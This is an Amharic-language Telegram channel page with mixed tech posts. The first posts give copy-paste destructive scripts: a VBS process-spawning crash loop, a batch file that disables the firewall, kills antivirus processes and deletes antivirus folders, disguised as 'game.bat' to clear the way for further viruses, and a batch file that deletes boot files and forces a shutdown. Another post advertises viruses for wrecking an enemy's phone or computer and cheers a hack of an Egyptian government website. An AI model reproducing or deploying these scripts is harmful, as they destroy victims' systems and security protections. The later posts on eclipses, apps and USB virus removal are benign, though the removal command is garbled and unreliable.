Telegram Web Link
3, ኮምፒውተርን ክራሽ የሚያደርግ

1️⃣ notepad መክፈት
2️⃣ ከስር ያለውን ኮድ copy ማረግ
👇👇👇👇👇👇👇👇👇👇👇
Dim WSHSHELL
Set
Wshshell=wscript.creatobject("wscript.shell")

Dim x
For x = 1 to 100000000
Wshshell.run "tourstart.exe"
👆👆👆👆👆👆👆👆👆👆👆

በመቀጠልም የፈለግነውን ስም ሰጥተን ፎርማቱን .vbs አርገን save እናደርገዋለን::


@techzone_ethio
አሁን ደግሞ የምናየው በኮምፒውተራችን ውስጥ የሚገኘውን አንቲ ቫይረስ በጠቅላላ የሚያጠፋ ቫይረስ አሰራር ይሆናል::

መጀመሪያ የኮምፒውተራቹን Notepad
ክፈቱት በመቀጠል ይህንን ኮድ ኮፒ አርጋችሁ
Notepad ላይ ፔስት አርጉት
🔴🔴🔴🔴🔴🔴🔴🔴🔴🔴🔴🔴
@ echo off
rem
rem Permanently Kill Anti-Viru
net stop “Security Center”
netsh firewall set opmode mode
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmincls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\al
del /Q /F C:\Program Files\La
del /Q /F C:\Program Files\ka
cls
del /Q /F C:\Program Files\tr
del /Q /F C:\Program Files\f-
del /Q /F C:\Program Files\tb
del /Q /F C:\Program Files\av
del /Q /F C:\Program Files\No
del /Q /F C:\Program Files\Mc
cls
del /Q /F C:\Program Files\No
del /Q /F C:\Program Files\No
del /Q /F C:\Program Files\No
del /Q /F C:\Program Files\No
cls
del /Q /F C:\Program Files\av
del /Q /F C:\Program Files\av
del /Q /F C:\Program Files\av
cls
del /Q /F C:\Program Files\av
del /Q /F C:\Program Files\av
del /Q /F C:\Program Files\gr
del /Q /F C:\Program Files\no
del /Q /F C:\Program Files\no
cls
del /Q /F C:\Program Files\no
del /Q /F C:\Program Files\no
del /Q /F C:\Program Files\ka
del /Q /F C:\Program Files\ka
del /Q /F C:\Program Files\ka
cls
del /Q /F C:\Program Files\ew
del /Q /F C:\Program Files\gu
del /Q /F C:\Program Files\ew
cls
del /Q /F C:\Program Files\pa
del /Q /F C:\Program Files\pa
del /Q /F C:\Program Files\av
cls
del /Q /F C:\Program Files\ap
del /Q /F C:\Program Files\we
del /Q /F C:\Program Files\pa
software\*.*
rem
🔵🔵🔵🔵🔵🔵🔵🔵🔵🔵🔵🔵
ይሄንን ኮድ በሚገባ ከፃፍችሁ በሁዋላ ማንኛውም ስም ሰጥታችሀት ከዛ ፎርማቱን .bat ብላችሁ ሴቭ አድርጉት
ለምሳሌ game.bat ብላቹ
ይህ ኮድ ከተከፈተ ኮምፒዩተሩ ያሉ #አንቲ ቫይረሶችሶ በሙሉ ያጠፋል ከዛ የፈለጋችሁትን ቫይረስ ማስገባት ትችላላችሁ::


@techzone_ethio
@techzone_ethio
በመጨረሻ ደግሞ እራሳችሁ በ Notpad በፃፋችሁት program አንድን #PC እንዴት ማውደም እንደምትችሉ እናያለን።
⚠️⚠️🚨WARNING⚠️⚠️🚨
‼️ቀላል ፕሮግራም ሆኖ ነገር ግን #pc ክራሽ ማድረግ የሚችል ‼️

⚠️Virus that crashes PC⚠️


@echo off attrib -r -s -h
c:autoexec.bat del
c:autoexec.bat attrib -r -s -h c:boot.ini del
c:boot.ini attrib -r -s -h
c:ntldr del c:ntldr attrib -r -s -h
c:windowswin.ini del c:windowswin.ini
@echo off msg *

YOU GOT OWNED!!! shutdown -s -t 7 -c "

A VIRUS IS TAKING OVER

C: ድራይ ውስጥ ማንኛውም ስም ሰጥታችሁት ፎርማቱን .bat በማድረግ save አርጉት::

⚠️⚠️ልክ ይሄ የሠራነው ቫይረስ ፕሮግራም ሲከፈት OWNED!! የሚል ሚሴጅ ይመጣና #pcው ይጠፋል::
ኮምፒውተሩ ድጋሜ reboot ላያደርግ ይችላል::⚠️⚠️

ALL OF THESE ARE TO BE TYPED IN NOTEPAD.

@techzone_ethio @techzone_ethio
@techzone_ethio @techzone_ethio
@techzone_ethio @techzone_ethio
የጠላታችሁን😡 ስልክ📲 እና ኮምፒውተር💻 ድምጥማጡን ማጥፋት ከፈለጋችሁ በውስጥ መስመር አናግሩኝ ኮምፒውተሩን እና ስልኩን ሊጎዱ የሚችሉ አንዳንድ በአፕሊኬሽን እና zip file መልክ የተሠሩ አደገኛ #ቫይረሶች አሉን‼️

contact @spy_hackers

🚨DON'T INSTALL IN YOUR PHONE, PC🚨

⚠️I am Not Responsible For Any Damage⚠️

@techzone_ethio @techzone_ethio
⚠️ማስጠንቀቂያ⚠️

#የአይን_ብሌናችንን_እንዳናጣ_ጥንቃቄ

የሰኔ 14/2012 ዓ.ም የፀሐይ ግርዶሽን በተመለከተ የቀረበ መረጃ፡፡

🌑የ2012 ዓ.ም ግርዶሽ የሚታየው፡-

- ሰኔ እሁድ 14/2012 ዓ.ም ነው፣
- በግርዶሹ 6፡00 ሰዓት የሚፈጅ ጨለማ ይታያል፡፡
- በመላ ኢትዮጵያ ይታያል፡፡
- በተለይ ወለጋ፣ ጎጃም፣ ጎንደር፣ ደሴ፣ አላማጣ፣ ኢንጂባራ 98% ጨለማ ሆኖ ይታያል፡፡
- የዓለምን አሰራር የኢኮኖሚ፣ የፖለቲካን፣ የከፍተኛ የተፈጥሮ ኃይል ሊገኝ ይችላል ብለው ሳንቲስቶች ሀሳባቸውን እየሰነዘሩ ይገኛሉ፡፡

- ከምዕራብ ኢትዮጵያ እስከ ሰሜን ኢትዮጵያ ድረስ ግርዶሹ ይታያል፡፡
- ፀሐይ 98% ትሸፈናለች፡፡

🌑የሚታይበት እና የሚያበቃበት፡-

- ከማዕከላዊ አፍሪካ ከኮንጎ ይነሳል፣ ሱዳን፣ ኢትዮጵያ፣ የመን፣ ፓኪስታን፣ ታይዋን፣ ንድና ቻይናን አቋርጦ ፓስፊክ ውቂያኖስ ላይ ያበቃል፡፡


🌑ሙሉ ግርዶሹ የሚታይበት ወቅት

- ከሌሊቱ ሰኔ 14/2012 ዓ.መ
- 11፡00 ሰዓት ይጀምራል፣
- ከጠዋቱ 12፡45 እስከ ቀኑ 6፡33


‼️ማስጠንቀቂያ፡-

- በዓይን ለማየት አይቻልም ዐይን ያሳውራል፣
- በሱቅ ውስጥ የሚሸጥ መነጽር መጠቀም አይገባም፡፡
- ለፀሐይ ግርዶሽ ተብሎ የተዘጋጀ መነጽር አለ፡፡
- መነጽሩ አገር ውሰጥ አይገኝም፡፡
-ለፀሀይ ግርዶሽ የሚሆን መነፀር አለን ከሚሉ አጭበርባሪዎች ጥንቃቄ ያድርጉ
- ሲጨልም ማየት እንችላለን ነገር ግን ያለመነጽር ለማየት አንሞክር፣በጣም ጥንቃቄ ሊታከልበት ይገባል
- ዐይናችን ሊፈስ ይችላል፣


አብዛኛው ኢትዮጽያዊ መረጃው ስሌለው እና የፀሀይ ግርዶሽ የሚታይበት ቀን ስለደረሰ ቢያንስ ለ ሚወዷቸው 10ሰወች ሼር በማድረግ መረጃው ለሁሉም እንዲደርስ የበኩልውን ይወጡ

@techzone_ethio
@techzone_ethio

ለወዳጆ ሼር በማረግ የሰውን አይን ከመፍሰስ ይታደጉ።
@techzone_ethio
💢ከቴሌግራም ላይ #Download 📥 የምናደርጋቸውን ነገሮች እንዴት በቀጥታ ሚሞሪ ላይ እንዲገቡ ማድረግ እንችላለን?

⬇️⬇️⬇️
1⃣. Plus Settings

⚠️ያከበብኩበት

@techzone_ethio
2⃣. Shared Media

@techzone_ethio
3⃣. Select Storage

@techzone_ethio
4⃣. ወደ External Storage ይቀይሩት።

#ጨርሰዋል👏

#share
@techzone_ethio
ውድ የ#Ethio_tech_zone ቤተሰቦች ሰሞኑን ማስታወቂያ እንዳበዛን እናውቃለን ይህም የቻናሉን ቤተሰብ ለማብዛት ስለሆነ leave ባለማለት ከጎናችን መሆናችሁን አሳዩን::

እናንተም ቤተሰቡን ለማብዛት #share በማረግ ተባበሩን🙏🙏🙏🙏

@techzone_ethio
@techzone_ethio
ማር ሲበዛ ይመራል እንደሚባል technologyም በዝቶ እንዳይመርብን ይቺን "mind game" ጹሁፍ ጋበዝናቹ
■■■ETHIO TECH ZONE■■■
የታጠቁ ዘራፊዎች ወደ ባንክ ገብተው “አንድም ሰው እንዳይንቀሳቀስ! ገንዘቡ የመንግሥት ነው፤ ሕይወታችሁ
ግን የእናንተ ነው” ሲሉ ድምጻቸውን ከፍ አድርገው ተናገሩ፡፡
© @techzone_ethio©
ሁሉም ሰው ወለሉ ላይ በደረቱ ተኛ፡፡ ይኼ “Mind Changing Concept” ይባላል፤ ከተለመደው ወጣ ባለ መልኩ የሰዎችን አስተሳሰብ መቀየር ነውና፡፡ ጠረጴዛ ላይ ተደፍታ የነበረች አንዲት ሴት የማጉረምረም ድምጽ ስታሰማ
ከዘራፊዎች ውስጥ አንዱ ቆጣ ብሎ “እመቤት እንደሰለጠነ ሰው አስቢ እንጂ፡፡ ይህ እኮ ዘረፋ እንጂ አስገድዶ መድፈር አይደለም” አላት፡፡ ፀጥ አለች፡፡ ይኼ “Being Professional” ነው። በሰለጠንክበት ጉዳይ ላይ ብቻ
ትኩረት ታደርጋለህና፡፡ ዘራፊዎቹ ያለምንም ችግር ቤታቸው
ገቡ፡፡ ከዘራፊዎቹ መካከል ልጅ እግሩ እና የMaster of Business
Administration ተመራቂው የተዘረፈው ገንዘብ እንዲቆጠር
በድንገት ሀሳብ አቀረበ፡፡ ነገር ግን በዕድሜ ታላቅ የሆነውና እስከ ስድስተኛ ክፍል ብቻ የተማረው ዘራፊ በቁጣ “አንተ
የማትረባ ደደብ! ይህን ሁሉ ገንዘብ ማን ይቆጥራል? ዛሬ ማታ በቴሌቪዥን ዜና ላይ ስንት እንደዘረፍን ይነግሩናል፡፡”
አለው። ይኼ “Experience” ይባላል፡፡ ዛሬ ዛሬ በትምህርት ከሚገኝ ዕውቀት ይልቅ ‘ልምድ' የበለጠ ዋጋ
አለው፡፡ ዘረፋው ከተፈፀመ በኋላ የባንኩ ማናጀር የባንኩን ሱፐርቫይዘር ጠርቶ በአስቸኳይ ፖሊስ እንዲጠራ ነገረው፡፡
ሱፐርቫይዘሩ ግን “አለቃ ቆይ ተረጋጋ እንጂ! ይኸውልህ መጀመሪያ ከካዘና 10 ሚሊየን አንስተን ለራሳችን እንውሰድ፡፡
ከዚያም ባለፉት ወራት የወሰድነውን 70 ሚሊየን እንጨምርበት፡፡ ለፖሊስ ሪፖርት ማድረግ ያለብን ይህን ገንዘብ ዛሬ ከተዘረፈው ጋር ደምረን ነው።” አለው፡፡ ይኼ “Swim with the tide” ይባላል፡፡ © @techzone_ethio ©
የተፈጠረን አስቸጋሪ ሁኔታ ለራስ ጥቅም ማዋል እንደ ማለት ነው፡፡ ሱፐርቫይዘሩም አለ፣ “በየወሩ
ዘረፋ ቢካሄድብን እንዴት መልካም ነበር!” በሚቀጥለው ቀን፡፡ ከባንኩ የተዘረፈው ገንዘብ 100 ሚሊየን እንደሆነ በቴሌቪዥን ዜና ተነገረ፡፡ ዘራፊዎች ደነገጡ፤ የዘረፉትንም መቁጠር ጀመሩ፤ ማመን አቃታቸው፤ደግመው ቆጠሩ፤ ያው ነው፡፡ ትንሽ ቆይተው እንደገና መቁጠር ጀመሩ፤ ተመሳሳይ መጠን - 20 ሚሊየን ብቻ! በጣም ተናደዱ፣ “እኛ ሕይወታችንን ለአደጋ አጋልጠን 20 ሚሊየን ብቻ ስናገኝ፣የባንክ ማናጀሩ ቁጭ ብሎ 80 ሚሊየን እንዴት ያገኛል?” ከንፈራቸውን ነከሱ፣ጠረጴዛውን በቡጢ ነረቱ፡፡ ሌባ ከመሆን ትምህርት መማር ይሻላል ማለት ይህ አይደል?i (Africa’s elites are lords of poverty!
ያለው ማን ነበር?) የማናጀሩ ፊት በፈገግታ እንደ ማለዳ ፀሐይ አብረቅርቋል፤ የደስታ ግምጃ አድምቆታል፡፡ በሽርክና ገበያው የተፈጠረበት ጉድለት ተሞልቶለታልና፡፡ ይኼንን “Seizing the opportunity” ይሉታል፡፡
Source:- Elias Chala
© @techzone_ethio©
ለቪዲዮ ኤዲቲንግ የሚያገለግሉ 10 የ አንግሮይድ አፖች

ቪዲዮን ኤዲት ለማድረግ የግድ ኮምፒውተር መጠቀም አይኖርቦትም። ዘመን አፈራሽ የሆኑ ቴክኖሎጂዎች ሞባይል ስልኮን ክኮምፒውተር ባልተናነሰ መልኩ ቪዲዮን ኤዲት አንዲያደርጉ ያስችሎታል። እኛም 10 ለቪዲዮ ኤዲቲንግ ያገለግላሉ ያልናቸውን አፖች የዘን ቀርበናል።

FilmoraGo በብዙ ተጠቃሚዎች ዘንድ የተወደደ አስደናቂ የ ዓንድሮኢድ ቪዲዮ ኤዲቲንግ መተግበሪያ ነው። የመቁረጥ ፣ ገጽታዎችን መቀየር ፣ ሙዚቃን ወዘተ የመሳሰሉት ዋና ዋና ተግባራት በቀላሉ ሊከናወኑ ይችላሉ ፡፡ እንዲሁም ለ Youtube ለ Instagram እና ለ Facebook ሚሆኒ ቪዲዮችን መስራት ይችናሉ
የዳውንሎድ ሊንክ: https://play.google.com/store/apps/details?id=com.wondershare.filmorago

Adobe Premiere Clip: አዶቤ ፕሪሚየር ክሊፕ ማንኛውንም ቪዲዮ ከእርስዎ የ ስማርት ፎን በፍጥነት እንዲያርትዑ ያስችልዎታል። ለመጠቀም ፈጣን እና አዝናኝ ነው። ስለ ክሊፕ በጣም ጥሩው ባህሪ አውቶማቲክ ቪዲዮ መፍጠር ችሎታ ነው ፣ ማለትም ፣ መተግበሪያው በመረጣቸው ማንኛቸውም ፎቶዎች ወይም ቅንጥቦች አማካኝነት ቪዲዮዎችን በራስ-ሰር ለእርስዎ መፍጠር ይችላል ፡፡
የዳውንሎድ ሊንክ: https://play.google.com/store/apps/details?id=com.adobe.premiereclip

VideoShow ብዙ ሽልማቶችን የተቀበለ ሲሆን በነጻ በ Play Store ውስጥ ለሚገኙት ምርጥ የቪዲዮ መተግበሪያዎች አንዱ ነው። VideoShow ለአጠቃቀም ቀላል እና ለአጠቃቀም ቀላል ነው ፡፡ ከዋና ዋና ተግባራት ፊልተሮችን ፣ ሙዚቃዎችን እና የድምፅ ውጤቶችን በመጨመር ወይም ቀጥታ ስርጭትን በማከናወን ቪዲዮዎን ማስዋብ ይችላሉ ፡፡
የዳውንሎድ ሊንክ: https://play.google.com/store/apps/details?id=com.xvideostudio.videoeditor

PowerDirector ለአጠቃቀም ቀላል የሆነ የጊዜ መስመር ያለው ሙሉ ለሙሉ የ አንግሮይድ ቪዲዮ ኤዲተር ነው ፣ ግን ከመቆጣጠሪዎች ጋር ለመግባባት የተወሰነ ጊዜ ሊወስድዎት ይችላል። ሆኖም ፣ አንዴ በዚህ መተግበሪያ ኤክስ ኤክስፐርት ከሆኑ ባለሙያዎችን መፍጠር እና በሰከንዶች ጊዜ ውስጥ ምርጥ የሚባሉ ቪዲዮዎችን መስራት ይችላሉ ፡፡ ከቪድዮዎ ውስጥ ለመምረጥ ከ 30 በላይ የተለያዩ የትራንዚሽን ምርጫዎች አሉት ፡፡
የዳውንሎድ ሊንክ: https://play.google.com/store/apps/details?id=com.cyberlink.powerdirector.DRA140225_01
KineMaster ከኃይለኛ ባህሪዎች ጋር በጥሩ ሁኔታ ከተሰራ በይነገጽ ጋር በመጣመር KineMaster ለ Android ተስማሚ የቪዲዮ አርት ኤዲቲንግ መሣሪያ ነው። የተለያዩ የሚዲያ ፋይሎችን በቀላሉ ለማስመጣት የ “copy paste” መጠቀም ይችላሉ። ቪዲዮዎችን በፍጥነት ለመፍጠር KineMaster ኤዲቲንግ ሂደት ላይ በይበልጥ ይረዳል። በቪዲዮ መቁረጥ የተለያዩ የሽግግር ዓይነቶችን መጨመር ፣ ወይም የጽሁፎችን ወይም የትርጉም ጽሑፎችን ብሎግ ማስገባት ይችላሉ

የዳውንሎድ ሊንክ: https://play.google.com/store/apps/details?id=com.nexstreaming.app.kinemasterfree

Quik እጅግ በጣም ጥሩ ቪዲዮዎችን ለመፍጠር ኩዊክ ሌላ ብልጥ መንገድ ነው ፡፡ ፈጣን እና ነፃ ነው። የራስዎን ታሪኮች በኩዊክ ለማድረግ የራስዎን ተወዳጅ ፎቶዎች ወይም ቪዲዮ ይምረጡ። ስለ ኩዊክ በጣም ጥሩው ነገር አውቶማቲክ የቪዲዮ ፈጠራ ችሎታዎች ይዞ መምጣቱ መሆኑ ነው ፡፡ ቪዲዮዎችን crop ማድረግ ፣ ማሳመሪያዎችን ፣ ጽሑፎችን መጨመር እና ማንኛውንም ሙዚቃ መምታት በፍጥነት ማመሳሰል ይችላሉ ፡፡
የዳውንሎድ ሊንክ: https://play.google.com/store/apps/details?id=com.stupeflix.replay
VivaVideo ብዙ አስደናቂ ባህሪዎች አሉት። መተግበሪያው በቀጥታ ከ አንግሮይድዎ ፕሮፌሽናል-የሚመስሉ ቪዲዮዎችን እንዲፈጥሩ ለማገዝ የታሰበ ነው። ከተለጣፊዎች እስከ ተንቀሣቃሽ ክሊፖች እና የትርጉም ጽሑፎች ከሚገኙ በመቶዎች የሚቆጠሩ ተስማሚ ፊልተሮች መምረጥ ይችላሉ ፡፡ በውስጡ የማይንቀሳቀስ ዘገምተኛ(slow motion) ተንቀሳቃሽ ቪዲዮ ሰሪ እና የተንሸራታች ማሳያ(slideshow maker) ሰሪ አለው።
የዳውንሎድ ሊንክ: https://play.google.com/store/apps/details?id=com.quvideo.xiaoying

Funimate video editor በቀላሉ አዝናኝ ቪዲዮዎችን ለመፍጠር ይረዳል። የዕለት ተዕለት አፍታዎችን ወዲያውኑ ወደ የፈጠራ ቪዲዮዎችን መለወጥ እና ለተለያዩ ማህበራዊ ሜዲያ የማጋሪያ አማራጮች አሉት ። አጭር ቪዲዮዎችን ኤዲት ለማድረግ የታቀዱ ከ ፻ በላይ የላቁ አማራጮች አሉት ፡፡

የዳውንሎድ ሊንክ: https://play.google.com/store/apps/details?id=com.avcrbt.funimate

Magisto መደበኛ የቪዲዮ ኤዲቲንግ ተሞክሮ ለሌላቸው ምርጥ የቪዲዮ ኤዲቲንግ መተግበሪያ ነው። ብዙ ጥረት ሳያደርጉ ምርጥ ቪዲዮን ለመስራት እንዲረዳዎ የቪዲዮ ክሊፕ ፣ ፎቶግራፎችን ፣ ሙዚቃን ፣ ጽሑፎችን ፣ የቪዲዮ ውጤቶችን እና የቪዲዮ ማጣሪያዎችን ይይዛል ፡፡ አንድ ወይም ከዛ በላይ ቪዲዮ ክሊፕ እና ለድምጽ ማጫወቻው አንድ ዘፈን ይምረጡ እና መተግበሪያው በጥቂት ደቂቃዎች ውስጥ አውቶማቲካሊ ቪዲዮ ይፈጥራል።
የዳውንሎድ ሊንክ: https://play.google.com/store/apps/details?id=com.magisto

@techzone_ethio
@techzone_ethio
😄😄👍👍👍☞☞☞Hey Guys....To day we will see how we can Remove Shortcut Virus from USB...
■Ethio tech zone■
♯jUst follow us.........

ፍላሽ ዲስክ ኮምፒዩተርዎ ላይ ሲሰካ ሾርት ከት እየሆነ
ተቸግረዋል?
ፍላሽ ዲስካችን ወይም ኮምፒዩተራችን በቫይረስ ሲጠቃ
በውስጡ ያሉት ፋይሎች በሙሉ ወይም በከፊል ወደ ሾርትከት
ይቀየራሉ። ይህም ማለት ዋናው የኛ file(ፋይል) ይደበቅና ለመጠቀም
አንችልም ማለት ነው። የዚህ ቫይረስ ሌላው አስቀያሚ ገጽታ
ከኮምፒዩተር ወደ ሌላ ኮምፒዩተር በቀላሉ በፋላሽ አማካኝነት
ሊተላለፍ መቻሉ ነው።
ውድ Ye channalachin ተከታታዮች ዛሬ ይህን ሾርትከት ቫይረስ
የምናጠፋበትን Tricks እናካፍላችኋለን ተከታተሉን።
By using CMD
cmd (command prompt) በመጠቀም
ይህ ዘዴ ከሁሉም የተሻለ ውጤታማ ሲሆን ለሀርድ ዲስኮች
ለፍላሾች እንዲሁም ለሞባይል ስልኮች ያገለግለናል።
1. በመጀመሪያ cmd እንከፍታለን።
Win + R then we write Cmd ( run፦cmd፦enter)
2. cmd ከከፈትን በኋላ ለማጽዳት የምንፈልገው ፋላሽ
ዳይሬክተሪ እንሄዳለን። ( ለምሳሌ ፍላሹ removable disk G
ከሆነ G:\ ብለን እንጽፋለን።)
3. በመቀጠል ይህን ኮማንድ እንጽፋለን። G፡. /d /s -h -r -
s (G ለምሳሌ ሲሆን እናንተ በራሳችሁ ፋላሽ ሆሄ
ትቀይሩታላችሁ።)
4. አሁን ኢንተርን ስትጫኑ ከሾርትከት ቫይረስ ተገላገላችሁ
ማለት ነው።

መረጃዎቹን ጠቃሚ ሆነው እንዳገኛችኋቸው ተስፋ እናደርጋለን።
ከተመቻችሁ share እና share በማድረግ ለሌሎች ያካፍሉ።

==================
join እና share ያድርጉ
@techzone_ethio
'ቀለበታዊ የፀሐይ ግርዶሽ' በአላማጣ ከተማ ሲከሰት በከተማው የነበረው ገፅታ በፎቶው የምትመለከቱትን ይመስል ነበር፤ 'ቀለበታዊ የፀሐይ ግርዶሹ ከ2:00:27 - 2:01:27 ድረስ ነው የቆየው።

🔄share & 🔈 #join
🔄share & 🔈 #join

@techzone_ethio
This media is not supported in your browser
VIEW IN TELEGRAM
ትናንት ምሽት ኢትዮጵያን ሀከሮች የግብፅን ዌብሳይት ሀክ ኣደረጉ😎

📌ቪድዮዉ ላይም EXPECT US ብለዉ ፅፈዉላቸዋል ዌብሳይቱ ደግሞ በግብፅ መንግስት ሚተዳደር የElectric Distribution company ነዉ!

🔥 ኣንዴ ሞቅ ያለ ጭብጨባ ለ ሀከሮቻችን 👏

@techzone_ethio
2025/07/06 15:50:43
Back to Top
HTML Embed Code: